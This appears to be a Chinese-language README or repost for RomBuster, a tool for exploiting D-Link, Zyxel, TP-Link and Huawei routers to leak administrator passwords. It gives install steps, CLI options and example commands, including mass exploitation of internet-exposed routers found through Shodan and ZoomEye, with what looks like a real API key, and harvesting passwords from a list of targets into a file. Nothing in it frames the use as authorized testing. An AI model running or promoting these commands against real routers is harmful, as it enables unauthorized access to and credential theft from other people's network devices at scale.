特征
漏洞利用漏洞在最流行的路由器,比如D-Link,Zyxel,TP-Link和Huawei。
优化为从启用线程的列表中一次利用多个路由器。
简单的 CLI 和 API 使用。
安装
pip3 install git+https://github.com/EntySec/RomBuster
基本用法
要使用 RomBuster,只需rombuster在您的终端中输入即可。
允许泄露网络路由器管理员密码的开发工具。
可选参数:
-h, --help 显示此帮助消息并退出 -t, --threads 使用线程以加快工作速度。-o OUTPUT, --output OUTPUT 输出结果到文件。-i INPUT, --input INPUT 地址的输入文件。-a ADDRESS, --address ADDRESS 单个地址。--shodan SHODAN Shodan API密钥,用于通过 Internet开发设备。--zoomeye ZOOMEYE ZoomEye API 密钥,用于通过 Internet 开发设备。-p PAGES, --pages PAGES 要从 ZoomEye 获取的页面数。
例子
rombuster -a 192.168.99.1
从 Internet 上利用
让我们尝试使用 Shodan 搜索引擎来利用 Internet 上的路由器,我们将使用它-t来快速利用。
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvg
从输入文件中攻击
让我们尝试使用打开的路由器数据库-t进行快速利用。
rombuster -t -i routers.txt -o passwords.txt
接口使用
RomBuster 也有自己的 Python API,可以通过将 RomBuster 导入您的代码来调用。
from rombuster import RomBuster
项目地址:
https://github.com/EntySec/RomBuster